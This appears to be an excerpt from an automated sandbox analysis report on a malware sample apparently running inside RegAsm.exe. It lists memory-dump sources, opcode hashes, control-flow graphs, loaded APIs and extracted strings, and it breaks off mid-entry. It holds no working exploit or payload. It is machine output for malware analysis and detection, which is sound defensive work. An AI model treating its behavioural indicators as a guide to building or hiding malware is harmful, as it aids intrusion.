                                                              • Source File: 00000000.00000002.2140360488.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_64d0000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8c5f24869de2895d375a91b11fe14b40199703bb1116f4f7663a50a6d4922438
                                                              • Instruction ID: bc535a88fb1c4bb9a2aef9528855208e48245c9acf6dfc907d91df25ac002a5f
                                                              • Opcode Fuzzy Hash: 8c5f24869de2895d375a91b11fe14b40199703bb1116f4f7663a50a6d4922438
                                                              • Instruction Fuzzy Hash: 4DD05E32716210170B29155E78D843BBBDFD7C8635754113AF609C3340DEA0CC0246E0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2140360488.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_64d0000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a302c4b064371fd8335d2fc0039840fc70fdeebb41cbac32c39f55faa77948e2
                                                              • Instruction ID: f28771b45fdc1ba8be2347f53e713fa9dc9611bf1d24b04d4b87ec14ba73f095
                                                              • Opcode Fuzzy Hash: a302c4b064371fd8335d2fc0039840fc70fdeebb41cbac32c39f55faa77948e2
                                                              • Instruction Fuzzy Hash: 53E04630A401108FCB48DFACE4954C8BFF4EF8822976101EAE119DB226DB3488268F96
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2140209895.0000000006470000.00000040.00000800.00020000.00000000.sdmp, Offset: 06470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6470000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e37edf62ce2b0e30f9f0d9215ab4c80711c9367316d524140cdbdc788b840838
                                                              • Instruction ID: 638f6f5ad9165ef1028f48b7ba6db8ecf4f31d79cfd12d7fc3ecb1fb6631a897
                                                              • Opcode Fuzzy Hash: e37edf62ce2b0e30f9f0d9215ab4c80711c9367316d524140cdbdc788b840838
                                                              • Instruction Fuzzy Hash: 06E04F75E04028EBCF489BA8E9015ED7736FB94310B408125E50177214CA3019199B91
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2139979923.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6410000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 08ebcd314e03728aaa0ca2fcc199d041a66f8814340611177cc9609982cc4e83
                                                              • Instruction ID: 487bc86ae2cb4dd031f4eb796869cb58e927535ea868ebf1c06d73e0c1fe0d59
                                                              • Opcode Fuzzy Hash: 08ebcd314e03728aaa0ca2fcc199d041a66f8814340611177cc9609982cc4e83
                                                              • Instruction Fuzzy Hash: 4AD05E7B62C424DF6B9A6640AD954BB7FAAEB902707144007ED4A8DA41C62598228AE0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2140360488.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_64d0000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3f52f53c1390be74d1acc03256da83eea2d8c240e3d74697152631f566f683fa
                                                              • Instruction ID: 29ae93bc505c78ac6f6156d43479301f812dc665663a1b3edd10aec6f01137b2
                                                              • Opcode Fuzzy Hash: 3f52f53c1390be74d1acc03256da83eea2d8c240e3d74697152631f566f683fa
                                                              • Instruction Fuzzy Hash: CBE012727041348FC689B799E56085937A6EF8861038146EBE54A9F366CF70AC064BD5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2140209895.0000000006470000.00000040.00000800.00020000.00000000.sdmp, Offset: 06470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6470000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6c91f2fe9b25ffd5692d3cca9d6a1a7919e87eeb8b50b401dfe2a2a0660c3574
                                                              • Instruction ID: 638b8ab2b60ed3f4275ea32b0a773119c91394923bcc86b0d2b7ef8e4201f470
                                                              • Opcode Fuzzy Hash: 6c91f2fe9b25ffd5692d3cca9d6a1a7919e87eeb8b50b401dfe2a2a0660c3574
                                                              • Instruction Fuzzy Hash: 2AE0BF74E1120CAFDB41EFB8D55569DBBB5EB44300F6085B9894DD3344EB301B459B92
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2140209895.0000000006470000.00000040.00000800.00020000.00000000.sdmp, Offset: 06470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6470000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1a8e12d899c34573d58d227d26cf3cebbdcc2054a46f085f66c2cc3803e47505
                                                              • Instruction ID: 1d4cb66b3dd1ad7aa13689fac373be5908ae82a4d26a32ce5f1e53aa3666caca
                                                              • Opcode Fuzzy Hash: 1a8e12d899c34573d58d227d26cf3cebbdcc2054a46f085f66c2cc3803e47505
                                                              • Instruction Fuzzy Hash: 8AD05B33300724774B14AA96ED00CABB76FDBC8660305853BFA0187610CD71E91197E4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2140209895.0000000006470000.00000040.00000800.00020000.00000000.sdmp, Offset: 06470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6470000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bb8eb75652fba5fee8bd66212aee857ffce093857c9b8a0d182a2c31dbdb88a1
                                                              • Instruction ID: 9ea51bff384d3ec1f6ea6639952cf1dbc726b5a6038f92ba3126ad8a828b79df
                                                              • Opcode Fuzzy Hash: bb8eb75652fba5fee8bd66212aee857ffce093857c9b8a0d182a2c31dbdb88a1
                                                              • Instruction Fuzzy Hash: 35E05B757400249FC7456FB9E414A1577EAFF4C6617108066FD0AC7395DE759C018B91
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2139979923.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6410000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cb2e3c50dbfe60fd890b2cac7ab9d9f7144703346da06eb3adc44cbcf432f61d
                                                              • Instruction ID: f14aca5246005f5118fbdb9e236f8594226837de6009cf7c6f9e885e39b07000
                                                              • Opcode Fuzzy Hash: cb2e3c50dbfe60fd890b2cac7ab9d9f7144703346da06eb3adc44cbcf432f61d
                                                              • Instruction Fuzzy Hash: 3FD02E7734E5880AE30A0678A8843BA3FC59F922B0F2C018AC2828D083C4824007C381
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2140360488.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_64d0000_4Ear91jgQ7.jbxd
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2140209895.0000000006470000.00000040.00000800.00020000.00000000.sdmp, Offset: 06470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6470000_4Ear91jgQ7.jbxd
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_64d0000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 02cb0da82850bc599ea20619564ea7ed9c7148473806617de7d5faba8ebd265a
                                                              • Instruction ID: dfbdc0a16d15c40b86dac51d487e6eb2dabd82d18eebfeb967d14e69a2c016af
                                                              • Opcode Fuzzy Hash: 02cb0da82850bc599ea20619564ea7ed9c7148473806617de7d5faba8ebd265a
                                                              • Instruction Fuzzy Hash: 2CA02230808008CB2BA0C820320803833A0C20000A30003C2FC0F80E008A320A2B0AC0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2140360488.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_64d0000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 08ccd8eba739f3b60567e7cd88742d04344ca89b6fa553fb89195f969c8fc1f9
                                                              • Instruction ID: 6396ef2d8ce708f66f4a86c30ab421eeda53789803117780cf74ca202c7eb9f3
                                                              • Opcode Fuzzy Hash: 08ccd8eba739f3b60567e7cd88742d04344ca89b6fa553fb89195f969c8fc1f9
                                                              • Instruction Fuzzy Hash: 9EA02230888008CB2BA08800300C038B3A0C30020230023C2FC0F80E808A32082B0BC0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2140360488.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_64d0000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: af43cc5c4d80cda387b2094c14239d5e62248ee6c1193c2d696429300fdbd66f
                                                              • Instruction ID: 8f04917f99a96193a8014a379af0a9bffa793b1fcb02e1af7b6b8b9db4ee5203
                                                              • Opcode Fuzzy Hash: af43cc5c4d80cda387b2094c14239d5e62248ee6c1193c2d696429300fdbd66f
                                                              • Instruction Fuzzy Hash: FBA02232888008CB2BA0C800300803833A0C28002A30003C2FC0F80E008A32082B0AC0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2140314326.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_64a0000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Xgq$Xgq$Xgq$Xgq
                                                              • API String ID: 0-1951159037
                                                              • Opcode ID: 8b66f39d5921a6724f5b0803ab61f1a61bdd3a6234931f1eb3e7f13cd81c3791
                                                              • Instruction ID: 642c399e516f02e1e3b25cd23e798e1df222757eacd715082903b8037f77194c
                                                              • Opcode Fuzzy Hash: 8b66f39d5921a6724f5b0803ab61f1a61bdd3a6234931f1eb3e7f13cd81c3791
                                                              • Instruction Fuzzy Hash: 14426921663D917EBB218B504C10EF7BB6AFBD2358786EC86F8929E10196304C4F97F5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2140209895.0000000006470000.00000040.00000800.00020000.00000000.sdmp, Offset: 06470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6470000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: %
                                                              • API String ID: 0-2567322570
                                                              • Opcode ID: fb5df7301153149c661ba9fd0227e73b3fe2cd88853a94024900c61e003987bd
                                                              • Instruction ID: d3fbae9ab79f6ad4df08274e95c24236a5b6bc4e2ace831ee08230fd9b9aca94
                                                              • Opcode Fuzzy Hash: fb5df7301153149c661ba9fd0227e73b3fe2cd88853a94024900c61e003987bd
                                                              • Instruction Fuzzy Hash: E2026F74A00218CFDB99DFA5C8546AEBBB2FF88300F10842ED5169F395DB71D946CB90
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2140360488.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_64d0000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 317490f131ad5570f44011a5099bea6a448ddbc148e74dbe2d9ce0e0ba099806
                                                              • Instruction ID: 8c272d3469084a778a3cd60db17c35221f605c64935bf3c8c7d78c16c8401472
                                                              • Opcode Fuzzy Hash: 317490f131ad5570f44011a5099bea6a448ddbc148e74dbe2d9ce0e0ba099806
                                                              • Instruction Fuzzy Hash: B9C20B34E00218CFDB65DF64C954AAEBBB2FF49305F1085AAD90AAB391D7719D81CF90
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2140314326.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_64a0000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 40795f871b85530209e3541be5991c742894ae47a404c2d68f148fba2fbf2b8d
                                                              • Instruction ID: d059a6db360707377fb190e74ab2c64292ca3203e3699f9fdd97dd04f9e3dcd4
                                                              • Opcode Fuzzy Hash: 40795f871b85530209e3541be5991c742894ae47a404c2d68f148fba2fbf2b8d
                                                              • Instruction Fuzzy Hash: 6F0212252A3C817EBB219B504C10EF7A75EFAE2399386ED86F8926E10055305C4FA7F5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2139979923.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6410000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8e7b2c5c88de6d44caaafba938942818d5683b0cffd32c4dbc951e4852506aa6
                                                              • Instruction ID: 77008abc8c62679bb8f79fbdb8a4f1d30f2aa64382ec8a64dfcbdefc0fcb2add
                                                              • Opcode Fuzzy Hash: 8e7b2c5c88de6d44caaafba938942818d5683b0cffd32c4dbc951e4852506aa6
                                                              • Instruction Fuzzy Hash: 7C6272B07002009BE749DF18C55972A7AE6EF84308F65C46DD10E9F396CBBAD94B8BD1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2139979923.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6410000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1a4d6a187e2a73bc990b04aaa8d2e9b0ab8d28aa61cd0fa3566bfd2ad018b7ee
                                                              • Instruction ID: d0d96a017f48467a8a7d9265e859eef91fbf47734308fd2a6f182c51c5f1a96b
                                                              • Opcode Fuzzy Hash: 1a4d6a187e2a73bc990b04aaa8d2e9b0ab8d28aa61cd0fa3566bfd2ad018b7ee
                                                              • Instruction Fuzzy Hash: B76272B07002009BE749DF18C55971A7AE6EF84308F65C46DD10E9F396CBBAD94B8BD1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2140209895.0000000006470000.00000040.00000800.00020000.00000000.sdmp, Offset: 06470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6470000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d978bb750cb621469c89ab3f01a2cda683b6c638d5f5177b5887db87be8d3fd9
                                                              • Instruction ID: 4e28ccddba630fb8575a33bb272f0adb7cbaf5bfa97d87a15624e2914c5ca516
                                                              • Opcode Fuzzy Hash: d978bb750cb621469c89ab3f01a2cda683b6c638d5f5177b5887db87be8d3fd9
                                                              • Instruction Fuzzy Hash: CFC19E74A006018FDB95DF69C5986AEBBF2EF89300F05C56AD5069B392CF34ED46CB90
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2140314326.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_64a0000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d308dba7dcaa131fbe1b5d4f765d5aec55c4e1847c77e9123a7283e7055854fc
                                                              • Instruction ID: 3acc40dee33b5fbd3880f9d142b571a2cb731e79f222be55878d91da7c19ebb4
                                                              • Opcode Fuzzy Hash: d308dba7dcaa131fbe1b5d4f765d5aec55c4e1847c77e9123a7283e7055854fc
                                                              • Instruction Fuzzy Hash: 60918170E00309AFDF51CFA8C98579EBBF2EF58704F19852AE408A7394EB749845CB81
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2140360488.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_64d0000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $kq$4ccq$4ccq$hkq$hkq
                                                              • API String ID: 0-2107953645
                                                              • Opcode ID: 3885e43fe08907ed39de9b6b8d85fcc9eec5222ea23d8e41970f2ed42d669cf8
                                                              • Instruction ID: c623f242de9d10bcd0e387be6c56f4a89a87115433f2c686cdbe212286a5b86b
                                                              • Opcode Fuzzy Hash: 3885e43fe08907ed39de9b6b8d85fcc9eec5222ea23d8e41970f2ed42d669cf8
                                                              • Instruction Fuzzy Hash: 37A15C70E002048FD755CF69C594A6ABBF6FF89314F26C49AE5499B3A6DB31EC80CB50

                                                              Execution Graph

                                                              Execution Coverage:1.1%
                                                              Dynamic/Decrypted Code Coverage:4.7%
                                                              Signature Coverage:8.7%
                                                              Total number of Nodes:149
                                                              Total number of Limit Nodes:11

                                                              Control-flow Graph

                                                              control_flow_graph 224 417a33-417a5c call 42e163 227 417a62-417a70 call 42e683 224->227 228 417a5e-417a61 224->228 231 417a80-417a91 call 42cb23 227->231 232 417a72-417a7d call 42e923 227->232 238 417a93-417aa7 LdrLoadDll 231->238 239 417aaa-417aad 231->239 232->231 238->239
                                                              APIs
                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417AA5
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2373373452.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Load
                                                              • String ID:
                                                              • API String ID: 2234796835-0
                                                              • Opcode ID: 57b256dc90908556de02122e3e008531c90e9e31a9dfdb2c76c4b937d2b6b965
                                                              • Instruction ID: a14b4ffdb5fe0ebae34abb196159bdaefeaa327230b00d9eb3ec642f8eb76095
                                                              • Opcode Fuzzy Hash: 57b256dc90908556de02122e3e008531c90e9e31a9dfdb2c76c4b937d2b6b965
                                                              • Instruction Fuzzy Hash: 940112B5E4010DBBDF10DAA5DC42FDEB7789F54304F004196E90897241F635EB548755

                                                              Control-flow Graph

                                                              control_flow_graph 245 42b593-42b5cf call 4049a3 call 42c643 NtClose
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2373373452.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Close
                                                              • String ID:
                                                              • API String ID: 3535843008-0
                                                              • Opcode ID: 74d62e7fed49fee6b13ec8ce7c6b43655ce95c97f7f228006ed85af9b9889e1d
                                                              • Instruction ID: 1573654a4f4f23356e70bd42089c4cb39e63ab89980323d43f3de8af3be88636
                                                              • Opcode Fuzzy Hash: 74d62e7fed49fee6b13ec8ce7c6b43655ce95c97f7f228006ed85af9b9889e1d
                                                              • Instruction Fuzzy Hash: 6BE04676204254BBC220AA6AEC41F9F776DDFC5724F00442AFA08A7282C6B5BA1186E5
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 6d1a49e6fb1a0ff63c62624b3b9492c02b2f1feb30d19c74b6ff8a846dc3efe6
                                                              • Instruction ID: abecfa306faa3e29507cd3b0aa347f5075b0835d871d978d25eee6376dabb3ae
                                                              • Opcode Fuzzy Hash: 6d1a49e6fb1a0ff63c62624b3b9492c02b2f1feb30d19c74b6ff8a846dc3efe6
                                                              • Instruction Fuzzy Hash: A290026120240413420571588454617800B87E0381B95C021E2014594DC53589916125
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 3833d978aed9358b95aaebd5226c3b85ba58bd06e107e60b9ce7a27e5b60cda0
                                                              • Instruction ID: 53e3dd2c38f45f97de1473147925b0259d80ce3fe2724691b16c318076f07c40
                                                              • Opcode Fuzzy Hash: 3833d978aed9358b95aaebd5226c3b85ba58bd06e107e60b9ce7a27e5b60cda0
                                                              • Instruction Fuzzy Hash: 6490023120148C12D2107158C44474B400687D0381F99C411A542465CD86A589917121
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0

                                                              Control-flow Graph

                                                              APIs
                                                              • PostThreadMessageW.USER32(H0840I45,00000111,00000000,00000000), ref: 00414107
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2373373452.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID: H0840I45$H0840I45
                                                              • API String ID: 1836367815-3713557624

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 71 42b903-42b947 call 4049a3 call 42c643 RtlFreeHeap
                                                              APIs
                                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4,?,?,?,?,?), ref: 0042B942
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2373373452.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FreeHeap
                                                              • String ID: gA
                                                              • API String ID: 3298025750-3478526202

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 203 417ab3-417abf 204 417ac1-417acf 203->204 205 417a8f-417a91 203->205 206 417ad1-417ad5 204->206 207 417a64-417a65 204->207 208 417a93-417aa7 LdrLoadDll 205->208 209 417aaa-417aad 205->209 210 417ad7-417b09 206->210 211 417b2a 206->211 212 417a6b-417a70 207->212 213 417a66 call 42e683 207->213 208->209 214 417b67-417b91 211->214 215 417b2c-417b2d 211->215 216 417a80-417a8c call 42cb23 212->216 217 417a72-417a7d call 42e923 212->217 213->212 216->205 217->216
                                                              APIs
                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417AA5
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2373373452.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Load
                                                              • String ID:
                                                              • API String ID: 2234796835-0

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 240 42b8b3-42b8f7 call 4049a3 call 42c643 RtlAllocateHeap
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(?,0041E238,?,?,00000000,?,0041E238,?,?,?), ref: 0042B8F2
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2373373452.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 250 42b953-42b98f call 4049a3 call 42c643 ExitProcess
                                                              APIs
                                                              • ExitProcess.KERNEL32(?,00000000,?,?,0FADE886,?,?,0FADE886), ref: 0042B98A
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2373373452.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExitProcess
                                                              • String ID:
                                                              • API String ID: 621844428-0
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-2160512332
                                                              Strings
                                                              • double initialized or corrupted critical section, xrefs: 02FA5508
                                                              • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 02FA540A, 02FA5496, 02FA5519
                                                              • Thread is in a state in which it cannot own a critical section, xrefs: 02FA5543
                                                              • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 02FA54E2
                                                              • Thread identifier, xrefs: 02FA553A
                                                              • corrupted critical section, xrefs: 02FA54C2
                                                              • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 02FA54CE
                                                              • undeleted critical section in freed memory, xrefs: 02FA542B
                                                              • Address of the debug info found in the active list., xrefs: 02FA54AE, 02FA54FA
                                                              • Invalid debug info address of this critical section, xrefs: 02FA54B6
                                                              • Critical section debug info address, xrefs: 02FA541F, 02FA552E
                                                              • 8, xrefs: 02FA52E3
                                                              • Critical section address, xrefs: 02FA5425, 02FA54BC, 02FA5534
                                                              • Critical section address., xrefs: 02FA5502
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                              • API String ID: 0-2368682639
                                                              Strings
                                                              Memory Dump Source
